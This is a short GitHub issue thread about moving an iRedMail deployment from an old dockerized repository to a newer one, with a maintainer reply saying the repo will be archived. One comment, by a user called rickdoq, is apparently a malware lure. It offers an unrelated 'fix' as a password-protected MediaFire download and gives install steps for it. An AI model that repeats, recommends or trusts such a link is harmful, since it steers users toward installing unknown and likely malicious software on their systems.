### ISSUE TITLE
Upgrade from old dockerized version

### ISSUE THREAD

**Issue by JReming85** [iredmail/dockerized2#2]
I know I am a bit late with this, but is there an easy way to switch from the old dockerized repo to this version?

It looks like the new package is trying to use innodb and gets hung up trying to create the vmail db because its already present (Im assuming)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by iredmail** [comment]
This repo will be archived soon since we're working on a new one with upcoming iRedMail Enterprise Edition: https://www.iredmail.org/ee.html 

Although this repo uses same program to generate software config files, but there's no web UI available.
